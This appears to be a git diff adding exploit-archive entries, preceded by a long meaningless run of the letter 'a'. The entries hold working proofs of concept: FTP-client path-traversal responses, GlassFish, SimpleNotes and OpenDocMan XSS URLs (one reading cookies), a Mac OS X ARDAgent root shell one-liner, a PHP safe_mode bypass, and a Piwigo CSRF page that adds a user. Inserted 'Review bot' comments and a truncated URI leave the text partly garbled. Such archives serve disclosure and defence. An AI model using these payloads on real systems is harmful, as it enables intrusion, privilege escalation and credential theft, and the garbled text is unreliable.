aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/29760/info
Skulltag is prone to a vulnerability that can cause denial-of-service conditions.
A successful attack will deny service to legitimate users.
Skulltag 0.97d2-RC3 is vulnerable; other versions may also be affected.
http://www.exploit-db.com/sploits/31932.zip

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/29720/info
Crysis is prone to an information-disclosure vulnerability caused by a design error.
Attackers can exploit this issue to obtain sensitive information that may lead to further attacks.
Crysis 1.21 and prior versions are affected.
http://www.exploit-db.com/sploits/31918.zip

View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/29741/info
Glub Tech Secure FTP is prone to a directory-traversal vulnerability because the application fails to sufficiently sanitize user-supplied input. This issue occurs in the FTP client.
Exploiting these issues will allow an attacker to write arbitrary files to locations outside of the application's current directory. This could help the attacker launch further attacks.
Secure FTP 2.5.15 for Microsoft Windows is vulnerable; other versions may also be affected.
Response to LIST:
\..\..\..\..\..\..\..\..\..\testfile.txt\r\n

View file

@ -0,0 +1,26 @@
source: http://www.securityfocus.com/bid/29749/info
3D-FTP is prone to multiple directory-traversal vulnerabilities because it fails to sufficiently sanitize user-supplied input data.
Exploiting these issues allows an attacker to write arbitrary files to locations outside of the FTP client's current directory. This could help the attacker launch further attacks.
3D-FTP 8.01 is vulnerable; other versions may also be affected.
The following example responses are available:
Response to LIST (backslash):
-rw-r--r-- 1 ftp ftp 20 Mar 01 05:37 \..\..\..\..\..\..\..\..\..\testfile.txt\r\n
Response to LIST (forward-slash):
-rw-r--r-- 1 ftp ftp 20 Mar 01 05:37 /../../../../../../../../../testfile.txt\r\n
Response to LIST (combination):
-rw-r--r-- 1 ftp ftp 20 Mar 01 05:37 ../..\/..\/..\/../..\/../..\/../testfile.txt\r\n
Response to MLSD (backslash):
type=file;modify=20080227074710;size=20; \..\..\..\..\..\..\..\..\..\testfile.txt\r\n
Response to MLSD (forward-slash):
type=file;modify=20080227074710;size=20; /../../../../../../../../../testfile.txt\r\n
Response to MLSD (combination):
type=file;modify=20080227074710;size=20; ../..\/..\/..\/../..\/../..\/../testfile.txt\r\n

View file

@ -0,0 +1,20 @@
source: http://www.securityfocus.com/bid/29751/info
Sun Glassfish is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://[HOSTNAME]:4848/resourceNode/customResourceNew.jsf?propertyForm%3Aproper
tyContentPage%3AtopButtons%3AnewButton=++OK++&propertyForm%3ApropertyContentPage
%3ApropertySheet%3ApropertSectionTextField%3AjndiProp%3AJndiNew=%3Cscript%3Ealer
t%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3Aproperty
Sheet%3ApropertSectionTextField%3AresTypeProp%3AresType=%3Cscript%3Ealert%28%27x
ss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%3A
propertSectionTextField%3AfactoryClassProp%3AfactoryClass=%3Cscript%3Ealert%28%2
7xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%
3ApropertSectionTextField%3AdescProp%3Adesc=%3Cscript%3Ealert%28%27xss%27%29%3B%
3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSecti
onTextField%3AstatusProp%3Asun_checkbox9=true&propertyForm%3AhelpKey=customresou
rcescreate.html&propertyForm_hidden=propertyForm_hidden&javax.faces.ViewState=j_
id276%3Aj_id282&com_sun_webui_util_FocusManager_focusElementId=propertyForm%3Apr
opertyContentPage%3AtopButtons%3AnewButton
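Review bot: the entry never states which GlassFish version was tested, unlike the other entries in this commit (compare `UltraEdit 14.00b is vulnerable; other versions may also be affected.`); add an affected-version line after the description. The same two description sentences are then repeated verbatim in six further 29751 files, so one extra line naming the administration page each file targets (here `resourceNode/customResourceNew.jsf`) would let readers tell the entries apart.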

View file

@ -0,0 +1,22 @@
source: http://www.securityfocus.com/bid/29751/info
Sun Glassfish is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://[HOSTNAME]:4848/resourceNode/externalResourceNew.jsf?propertyForm%3Aprope
rtyContentPage%3AtopButtons%3AnewButton=++OK++&propertyForm%3ApropertyContentPag
e%3ApropertySheet%3ApropertSectionTextField%3AjndiProp%3AJndiNew=%3Cscript%3Eale
rt%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3Apropert
ySheet%3ApropertSectionTextField%3AresTypeProp%3AresType=%3Cscript%3Ealert%28%27
xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%3
ApropertSectionTextField%3AfactoryClassProp%3AfactoryClass=%3Cscript%3Ealert%28%
27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet
%3ApropertSectionTextField%3AjndiLookupProp%3AjndiLookup=%3Cscript%3Ealert%28%27
xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%3
ApropertSectionTextField%3AdescProp%3Adesc=%3Cscript%3Ealert%28%27xss%27%29%3B%3
C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectio
nTextField%3AstatusProp%3Asun_checkbox9=true&propertyForm%3ApropertyContentPage%
3AhelpKey=externalresourcescreate.html&propertyForm_hidden=propertyForm_hidden&j
avax.faces.ViewState=j_id289%3Aj_id293&com_sun_webui_util_FocusManager_focusElem
entId=propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton

View file

@ -0,0 +1,19 @@
source: http://www.securityfocus.com/bid/29751/info
Sun Glassfish is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://[HOSTNAME]:4848/resourceNode/jmsDestinationNew.jsf?propertyForm%3Apropert
yContentPage%3AtopButtons%3AnewButton=++OK++&propertyForm%3ApropertySheet%3Aprop
ertSectionTextField%3AjndiProp%3AJndi=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fs
cript%3E&propertyForm%3ApropertySheet%3ApropertSectionTextField%3AnameProp%3Anam
e=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyShee
t%3ApropertSectionTextField%3AresTypeProp%3AresType=javax.jms.Topic&propertyForm
%3ApropertySheet%3ApropertSectionTextField%3AdescProp%3Adesc=%3Cscript%3Ealert%2
8%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertySheet%3ApropertSectionTex
tField%3AstatusProp%3Acb=true&propertyForm%3AbasicTable%3ArowGroup1%3A0%3Acol2%3
Acol1St=Description&propertyForm%3AbasicTable%3ArowGroup1%3A0%3Acol3%3Acol1St=&p
ropertyForm%3AhelpKey=jmsdestinationnew.html%09&propertyForm_hidden=propertyForm
_hidden&javax.faces.ViewState=j_id242%3Aj_id246&com_sun_webui_util_FocusManager_
focusElementId=propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton

View file

@ -0,0 +1,25 @@
source: http://www.securityfocus.com/bid/29751/info
Sun Glassfish is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://[HOSTNAME]:4848/resourceNode/jmsConnectionNew.jsf?propertyForm%3Aproperty
ContentPage%3AtopButtons%3AnewButton=++OK++&propertyForm%3ApropertySheet%3Agener
alPropertySheet%3AjndiProp%3AJndi=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscrip
t%3E&propertyForm%3ApropertySheet%3AgeneralPropertySheet%3AresTypeProp%3AresType
=javax.jms.TopicConnectionFactory&propertyForm%3ApropertySheet%3AgeneralProperty
Sheet%3AdescProp%3Acd=%3Cscript%3Ealert%28%27xss2%27%29%3B%3C%2Fscript%3E&proper
tyForm%3ApropertySheet%3AgeneralPropertySheet%3AstatusProp%3Asun_checkbox9=true&
propertyForm%3ApropertySheet%3ApoolSettingsPropertySheet%3AinitSizeProp%3Ads=8&p
ropertyForm%3ApropertySheet%3ApoolSettingsPropertySheet%3AmaxProp%3Ads2=32&prope
rtyForm%3ApropertySheet%3ApoolSettingsPropertySheet%3AresizeProp%3Ads3=2&propert
yForm%3ApropertySheet%3ApoolSettingsPropertySheet%3AidleProp%3Ads=300&propertyFo
rm%3ApropertySheet%3ApoolSettingsPropertySheet%3AmaxWaitProp%3Ads=60000&property
Form%3ApropertySheet%3ApoolSettingsPropertySheet%3Atransprop%3Atrans=&propertyFo
rm%3AbasicTable%3ArowGroup1%3A0%3Acol2%3Acol1St=Password&propertyForm%3AbasicTab
le%3ArowGroup1%3A0%3Acol3%3Acol1St=guest&propertyForm%3AbasicTable%3ArowGroup1%3
A1%3Acol2%3Acol1St=UserName&propertyForm%3AbasicTable%3ArowGroup1%3A1%3Acol3%3Ac
ol1St=guest&propertyForm%3AhelpKey=jmsconnectionnew.html&propertyForm_hidden=pro
pertyForm_hidden&javax.faces.ViewState=j_id226%3Aj_id234&com_sun_webui_util_Focu
sManager_focusElementId=propertyForm%3ApropertyContentPage%3AtopButtons%
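Review bot: the proof-of-concept URI is truncated: it stops at `topButtons%` in the middle of a percent-encoded sequence, whereas every other 29751 entry in this commit ends with `...topButtons%3AnewButton`. As written the request is not even a valid URL, so the tail should be restored from the original advisory before the file is archived.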

View file

@ -0,0 +1,16 @@
source: http://www.securityfocus.com/bid/29751/info
Sun Glassfish is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://[HOSTNAME]:4848/resourceNode/jdbcResourceNew.jsf?propertyForm%3ApropertyC
ontentPage%3AtopButtons%3AnewButton=++OK++&propertyForm%3ApropertySheet%3Aproper
tSectionTextField%3AjndiProp%3Ajnditext=<script>alert('xss');</script>&propertyF
orm%3ApropertySheet%3ApropertSectionTextField%3ApoolNameProp%3APoolName=__CallFl
owPool&propertyForm%3ApropertySheet%3ApropertSectionTextField%3AdescProp%3Adesc=
<script>alert('xss3');</script>&propertyForm%3ApropertySheet%3ApropertSectionTex
tField%3AstatusProp%3Asun_checkbox9=true&propertyForm%3AhelpKey=jdbcresourcenew.
html&propertyForm_hidden=propertyForm_hidden&javax.faces.ViewState=j_id185%3Aj_i
d201&com_sun_webui_util_FocusManager_focusElementId=propertyForm%3ApropertyConte
ntPage%3AtopButtons%3AnewButton

View file

@ -0,0 +1,20 @@
source: http://www.securityfocus.com/bid/29751/info
Sun Glassfish is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://[HOSTNAME]:4848/applications/lifecycleModulesNew.jsf?propertyForm%3Aprope
rtyContentPage%3ApropertySheet%3ApropertSectionTextField%3AnameProp%3Aname=<scri
pt>alert('xss');</script>&propertyForm%3ApropertyContentPage%3ApropertySheet%3Ap
ropertSectionTextField%3AclassNameProp%3Aclassname=<script>alert('xss2');</scrip
t>&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%
3ApathProp%3AclassPath=&propertyForm%3ApropertyContentPage%3ApropertySheet%3Apro
pertSectionTextField%3AloadOrderProp%3AloadOrder=<script>alert('xss3');</script>
&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%3A
descProp%3Adesc=&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSec
tionTextField%3AstatusProp%3Asun_checkbox8=true&propertyForm%3ApropertyContentPa
ge%3AbottomButtons%3AsaveButton2=++OK++&propertyForm%3AhelpKey=lifecyclemodules.
html&propertyForm_hidden=propertyForm_hidden&javax.faces.ViewState=j_id117%3Aj_i
d125&com_sun_webui_util_FocusManager_focusElementId=propertyForm%3ApropertyConte
ntPage%3AbottomButtons%3AsaveButton2

View file

@ -0,0 +1,16 @@
source: http://www.securityfocus.com/bid/29751/info
Sun Glassfish is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://[HOSTNAME]:4848/resourceNode/jdbcConnectionPoolNew1.jsf?propertyForm%3Apr
opertyContentPage%3AtopButtons%3AnextButton=+Next+&propertyForm%3ApropertyConten
tPage%3ApropertySheet%3AgeneralPropertySheet%3AjndiProp%3Aname=<script>alert('xs
s')</script>&propertyForm%3ApropertyContentPage%3ApropertySheet%3AgeneralPropert
ySheet%3AresTypeProp%3AresType=<script>alert('xss2');</script>&propertyForm%3Apr
opertyContentPage%3ApropertySheet%3AgeneralPropertySheet%3AdbProp%3Adb=<script>a
lert('xss3');</script>&propertyForm%3AhelpKey=jdbcconnectionpoolnew1.html&proper
tyForm_hidden=propertyForm_hidden&javax.faces.ViewState=j_id7%3Aj_id34&com_sun_w
ebui_util_FocusManager_focusElementId=propertyForm%3ApropertyContentPage%3AtopBu
ttons%3AnextButton

View file

@ -0,0 +1,17 @@
source: http://www.securityfocus.com/bid/29784/info
UltraEdit is prone to a directory-traversal vulnerability because the application fails to sufficiently sanitize user-supplied input. This issue occurs in the FTP/SFTP client.
Exploiting this issue will allow an attacker to write arbitrary files to locations outside of the application's current directory. This could help the attacker launch further attacks.
UltraEdit 14.00b is vulnerable; other versions may also be affected.
Response to LIST (backslash):
\..\..\..\..\..\..\..\..\..\testfile.txt\r\n
Response to LIST (forward-slash):
/../../../../../../../../../testfile.txt\r\n
Response to LIST (backslash and forward-slash):
../..\/..\/..\/../..\/../..\/../testfile.txt\r\n

View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/29844/info
WISE-FTP is prone to a directory-traversal vulnerability because the application fails to sufficiently sanitize user-supplied input.
Exploiting this issue allows an attacker to write arbitrary files to locations outside of the application's current directory. This could help the attacker launch further attacks.
Versions prior to WISE-FTP 5.5.9 are vulnerable.
Response to LIST:
\..\..\..\..\..\..\..\..\..\testfile.txt\r\n

View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/29846/info
Classic FTP is prone to a directory-traversal vulnerability because the application fails to sufficiently sanitize user-supplied input.
Exploiting this issue allows an attacker to write arbitrary files to locations outside of the application's current directory. This could help the attacker launch further attacks.
Classic FTP 1.02 for Microsoft Windows is vulnerable; other versions may also be affected.
Response to LIST:
\..\..\..\..\..\..\..\..\..\testfile.txt\r\n
/../../../../../../../../../testfile.txt\r\n

9
platforms/osx/local/31940.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/29831/info
Mac OS X is prone to a local privilege-escalation vulnerability affecting ARDAgent (Apple Remote Desktop).
Successful exploits allow local attackers to execute arbitrary code with superuser privileges, completely compromising the affected computer.
This issue is confirmed to affect Mac OS X 10.5 versions; earlier versions may also be vulnerable.
osascript -e 'tell app "ARDAgent" to do shell script "whoami"';

45
platforms/php/local/31937.txt Executable file
View file

@ -0,0 +1,45 @@
source: http://www.securityfocus.com/bid/29796/info
PHP is prone to multiple 'safe_mode' restriction-bypass vulnerabilities. Successful exploits could allow an attacker to determine the presence of files in unauthorized locations; other attacks are also possible.
Exploiting these issues allows attackers to obtain sensitive data that could be used in other attacks.
These vulnerabilities would be an issue in shared-hosting configurations where multiple users can create and execute arbitrary PHP script code; in such cases, the 'safe_mode' restriction is expected to isolate users from each other.
PHP 5.2.6 is vulnerable; other versions may also be affected.
cxib# cat /www/wufff.php
<?
echo getcwd()."\n";
chdir("/etc/");
echo getcwd()."\n";
?>
cxib# ls -la /www/wufff.php
-rw-r--r-- 1 www www 62 Jun 17 17:14 /www/wufff.php
cxib# php /www/wufff.php
/www
Warning: chdir(): SAFE MODE Restriction in effect. The script whose uid
is 80 is not allowed to access /etc/ owned by uid 0 in /www/wufff.php on
line 3
/www
cxib#
---/EXAMPLE1---
---EXAMPLE2---
cxib# ls -la /www/wufff.php
-rw-r--r-- 1 www www 74 Jun 17 17:13 /www/wufff.php
cxib# ls -la /www/http:
total 8
drwxr-xr-x 2 www www 512 Jun 17 17:12 .
drwxr-xr-x 19 www www 4608 Jun 17 17:13 ..
cxib# cat /www/wufff.php
<?
echo getcwd()."\n";
chdir("http://../../etc/");
echo getcwd()."\n";
?>
cxib# php /www/wufff.php
/www
/etc
cxib#
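Review bot: the `---/EXAMPLE1---` closing marker at the end of the first transcript has no matching `---EXAMPLE1---` opener, so the file is inconsistent with the `---EXAMPLE2---` block that follows; add the opening marker before the first `cat /www/wufff.php`. The second transcript also relies on a precondition the description leaves out: the `ls -la /www/http:` output shows that a directory literally named `http:` has to exist under the script's working directory before `chdir("http://../../etc/")` resolves past the safe_mode check, so the description should state that requirement rather than leaving the reader to infer it from the listing.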

33
platforms/php/webapps/31916.txt Executable file
View file

@ -0,0 +1,33 @@
# Exploit Title: piwigo 2.6.1 - CSRF
# Date: 26/02/2014
# Exploit Author: killall-9@mail.com
# Vendor Homepage: http://it.piwigo.org/
# Software Link: http://it.piwigo.org/basics/downloads
# Version: 2.6.1
# Tested on: Virtualbox debian
A CSRF problem is present in the administration panel.
Here it is a POF according to a derived POST:
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'>
<html lang="en">
<head>
<title>Piwigo 2.6.1</title>
</head>
<body>
<form action="http://localhost/piwigo/ws.php?format=json&method=pwg.users.add http://localhost/piwigo/ws.php?format=json&method=pwg.users.add&lang=en " id="formid" method="post">
<input name="username" value="utente" />
<input name="password" value="utente" />
<input name="email" value="utente@gmail.com http://service.mail.com/callgate-6.73.1.0/rms/6.73.1.0/mail/getBody?folderId=1&messageId=OTg2SQZUNUQ2Occvtn5u651INxBSYcL4&purpose=display&bodyType=html# "/>
</form>
<script>
document.getElementById('formid').submit();
</script>
</body>
</html>
So you can add a new arbitrary user.
cheerz°°°°
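Review bot: the form's `action` attribute holds two URLs separated by a space (`...method=pwg.users.add http://localhost/piwigo/ws.php?...&lang=en `) and the `email` input has a webmail `getBody?...` link pasted after the address; both look like browser copy-and-paste artefacts and should be cleaned up before the entry is archived, since as written the page does not post to a single well-formed endpoint. `POF` in `Here it is a POF` should read `PoC`, and ampersands inside HTML attribute values should be written `&amp;`. The entry would also be more useful with one sentence on the root cause the description only names: `pwg.users.add` accepting a state-changing POST with no anti-CSRF token.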

22
platforms/php/webapps/31929.txt Executable file
View file

@ -0,0 +1,22 @@
source: http://www.securityfocus.com/bid/29755/info
SimpleNotes is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/path/snoteindex.php?RootID=[XSS]
http://www.example.com/path/snoteindex.php?RootID=></a></td><script>alert(123)</script>
http://www.example.com/path/snoteindex.php?RootID=1&SnoteID=[XSS]
http://www.example.com/path/snoteindex.php?RootID=1&SnoteID=></a></td><script>alert(123)</script>
http://www.example.com/path/snoteindex.php?RootID=1&SnoteID=1&mode=list&action=selectedit&MaxLevel=[XSS]
http://www.example.com/path/snoteindex.php?RootID=1&SnoteID=1&mode=list&action=selectedit&MaxLevel=></a></td><script>alert(123)</script>
http://www.example.com/path/snoteindex.php?RootID=1&SnoteID=1&mode=list&action=selectedit&MaxLevel=100&MoveWhat=[XSS]
http://www.example.com/path/snoteindex.php?RootID=1&SnoteID=1&mode=list&action=selectedit&MaxLevel=100&MoveWhat=></a></td><script>alert(123)</script>
http://www.example.com/path/snoteform.php?RootID=[XSS]
http://www.example.com/path/snoteform.php?RootID="></a></td><script>alert(123)</script>
http://www.example.com/path/snoteform.php?RootID=1&SnoteID=[XSS]
http://www.example.com/path/snoteform.php?RootID=1&SnoteID="></a></td><script>alert(123)</script>
http://www.example.com/path/snoteform.php?RootID=1&SnoteID=1&mode=list&action=selectedit&MaxLevel=[XSS]
http://www.example.com/path/snoteform.php?RootID=1&SnoteID=1&mode=list&action=selectedit&MaxLevel="></a></td><script>alert(123)</script>
http://www.example.com/path/snoteform.php?RootID=1&SnoteID=1&mode=list&action=selectedit&MaxLevel=100&MoveWhat=[XSS]
http://www.example.com/path/snoteform.php?RootID=1&SnoteID=1&mode=list&action=selectedit&MaxLevel=100&MoveWhat="></a></td><script>alert(123)</script>

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/29765/info
OpenDocMan is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
OpenDocMan 1.2.5 is vulnerable; other versions may also be affected.
http://www.example.com/opendocman-1.2.5/out.php?last_message=%3Cscript%3Ealert(document.cookie)%3C/script%3E

View file

@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/29771/info
Basic-CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
